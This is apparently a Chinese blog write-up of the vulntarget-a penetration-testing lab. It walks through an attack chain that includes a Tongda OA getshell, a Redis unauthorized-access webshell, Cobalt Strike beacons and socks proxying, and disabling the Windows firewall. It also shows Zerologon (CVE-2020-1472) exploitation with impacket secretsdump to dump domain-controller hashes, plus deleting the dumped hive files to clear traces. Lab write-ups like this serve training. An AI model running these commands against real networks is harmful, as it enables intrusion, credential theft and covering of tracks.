vulntarget-a靶场复现

目录

1、web渗透win7 

1、直接访问发现是通达OA系统​编辑

2、使用liqun工具直接getshell​编辑

 3、使用蚁剑直接连接

4、查看靶机信息​编辑

2、通过扫描发现6379端口,在kali中利用redis未授权访问GetShell,拿下win2016靶机

1、使用CobaltStrike工具上线win2016

4、配置蚁剑的代理,连接win2016​编辑

BC-2、利用cobalt strike关闭防火墙并在cobalt strike上上线win2016

3、利用CVE-2020-1472漏洞拿下win2019

1、利用fscan扫描工具通过win2016对win2019进行内网扫描

2、对win2019进行监听​编辑

 3、在kali中利用CVE-2020-1472漏洞,利用impacket得到win2019域控主机的哈希值 

4、通过smp连接,下载sam、security、system并清楚痕迹,将机器的哈希值还原​编辑



1、web渗透win7 

1、直接访问发现是通达OA系统vulntarget-a靶场复现_第1张图片

2、使用liqun工具直接getshellvulntarget-a靶场复现_第2张图片

 3、使用蚁剑直接连接

拿下win7靶机vulntarget-a靶场复现_第3张图片

4、查看靶机信息vulntarget-a靶场复现_第4张图片

2、通过扫描发现6379端口,在kali中利用redis未授权访问GetShell,拿下win2016靶机

1、使用CobaltStrike工具上线win2016

1、修改teamserver配置端口为54321,将CS文件复制到windows10和kali中

先启动kali中CobaltStrike的服务器端 设置密码为kali,端口为54321,并运行。

./teamserver 192.168.119.131 kalivulntarget-a靶场复现_第5张图片

之后启动windows10客户机端,运行Cobalt_Strike_CN.bat文件,配置信息并连接。vulntarget-a靶场复现_第6张图片

 2、在CobaltStrike创建一个监听器,并生成一个后门

 vulntarget-a靶场复现_第7张图片vulntarget-a靶场复现_第8张图片

 3、上传后门并运行vulntarget-a靶场复现_第9张图片vulntarget-a靶场复现_第10张图片

4、扫描上线的主机10.0.20.98,发现10.0.20.99主机。

vulntarget-a靶场复现_第11张图片

5、对发现的10.0.20.99主机进行扫描vulntarget-a靶场复现_第12张图片

得到扫描到开放的端口vulntarget-a靶场复现_第13张图片 

6、对win7主机进行代理vulntarget-a靶场复现_第14张图片

 7、在浏览器中设置代理vulntarget-a靶场复现_第15张图片

 vulntarget-a靶场复现_第16张图片

 8、进行目录扫描,发现网站的绝对路径

phpinfo.phpvulntarget-a靶场复现_第17张图片

 2、使用代理工具

 vulntarget-a靶场复现_第18张图片vulntarget-a靶场复现_第19张图片

 在被控端运行windows_x86_agent.exe,进行连接

windows_x86_agent.exe -c 192.168.119.129:19999 -s 123vulntarget-a靶场复现_第20张图片

使用0节点,开启socks代理,设置端口号为18888vulntarget-a靶场复现_第21张图片

在浏览器中设置代理将御剑连通被控端的内网vulntarget-a靶场复现_第22张图片

运用一个代理工具来代理本机工具vulntarget-a靶场复现_第23张图片

将御剑使用proxification代理到本机18888端口vulntarget-a靶场复现_第24张图片

 vulntarget-a靶场复现_第25张图片

 使用cobalt strike和御剑端口扫描工具,发现6379端口,可以利用redis来getshell

 vulntarget-a靶场复现_第26张图片

 3、在kali中利用proxychains4代理redis来GetShell-win2016

在kali中打开proxychains4修改配置文件,把已经通过本机在win7开放的代理端口添加进去

kwrite /ect/proxychains4.conf

socks5 192.168.119.129 18888vulntarget-a靶场复现_第27张图片

 vulntarget-a靶场复现_第28张图片

 使用proxychains4代理redis

proxychains4 redis-cli -h 10.0.20.99vulntarget-a靶场复现_第29张图片vulntarget-a靶场复现_第30张图片

用redis获取shellvulntarget-a靶场复现_第31张图片

查看shel.php是否上传成功vulntarget-a靶场复现_第32张图片

4、配置蚁剑的代理,连接win2016vulntarget-a靶场复现_第33张图片

拿下win2016主机10.0.20.99vulntarget-a靶场复现_第34张图片

BC-2、利用cobalt strike关闭防火墙并在cobalt strike上上线win2016

1、通过蚁剑连接上win2016靶机10.0.20.99后查看信息

发现拥有管理员权限,同时还存在一台内网主机

whoami

ipconfig -allvulntarget-a靶场复现_第35张图片

2、利用cobalt strike对10.0.20.99进行监听,监听端口为6666vulntarget-a靶场复现_第36张图片

 vulntarget-a靶场复现_第37张图片

 3、使用cobalt strike连接发现连接不上并且ping不通,怀疑开了防火墙,接下来尝试关闭靶机win2016的防火墙

shell netsh advfirewall set allprofiles state offvulntarget-a靶场复现_第38张图片

 成功上线win2016

connect 10.0.20.99 6666vulntarget-a靶场复现_第39张图片

 此时在cobalt strike上线了靶机win2016

3、利用CVE-2020-1472漏洞拿下win2019

1、利用fscan扫描工具通过win2016对win2019进行内网扫描

先进行域名解析

vulntarget-a靶场复现_第40张图片

先通过蚁剑上传fscan内网扫描工具vulntarget-a靶场复现_第41张图片

将扫描出的结果保存在文本中

fscan64.exe -h 10.0.10.110 >1.txtvulntarget-a靶场复现_第42张图片

查看扫描结果发现DC域控制器win2019vulntarget-a靶场复现_第43张图片

接下来利用CVE-2020-1472漏洞拿下win2019

2、对win2019进行监听vulntarget-a靶场复现_第44张图片

通过win7靶机建立对wn2016的监听

use 0 :19999-----> use 1:10001

在本机服务端创建监听1,端口号为10001vulntarget-a靶场复现_第45张图片

在win2016中运行客户端监听器

在本机端口17777端口成功监听到win2016靶机vulntarget-a靶场复现_第46张图片

先在本机中下载依赖安装

pip3 install -r requirements.txtvulntarget-a靶场复现_第47张图片

 提示本机pip版本过低,先将pip升级

python -m pip install --upgrade pipvulntarget-a靶场复现_第48张图片

 通过CVE-2020-1472_poc验证,发现win2019为DC域控端

python3 zerologon_tester.py WIN201910.0.10.110

 

 vulntarget-a靶场复现_第49张图片

 3、在kali中利用CVE-2020-1472漏洞,利用impacket得到win2019域控主机的哈希值 

在kali中下载impacket依赖安装

python3 -m pip install impacket

python3 -m pip install .vulntarget-a靶场复现_第50张图片

 vulntarget-a靶场复现_第51张图片

 利用impacket得到win2019的哈希值

proxychains4 python3 secretsdump.py VULNTARGET/WIN2019\[email protected] -no-passvulntarget-a靶场复现_第52张图片

 

4、通过smp连接,下载sam、security、system并清楚痕迹,将机器的哈希值还原vulntarget-a靶场复现_第53张图片

 查看当前路径下的文件,下载sam、security、system文件

 vulntarget-a靶场复现_第54张图片

 vulntarget-a靶场复现_第55张图片

 vulntarget-a靶场复现_第56张图片

 vulntarget-a靶场复现_第57张图片

 清除三个文件的下载记录

del /f sam.save

del /f security.save

del /f system.savevulntarget-a靶场复现_第58张图片

 利用ntm哈希值还原机器账户的哈希值

python3 secretsdumo.py -sam sam.save -system system.save -security security.save LOCAL

   e784e73f9ce07e98f2894b59c2efa422vulntarget-a靶场复现_第59张图片

 还原哈希值

python3 reinstall_original_ow.py WIN2019 10.0.10.110 e784e73f9ce07e98f2894b59c2efa422vulntarget-a靶场复现_第60张图片

 查看是否清理干净

proxychains4 python secretsdump.py -just-dc -no-pass VULNTARGET/WIN2019\[email protected]vulntarget-a靶场复现_第61张图片

下载地址:

百度云

链接: 百度网盘 请输入提取码 提取码: 2dwq

你可能感兴趣的:(php,java,开发语言)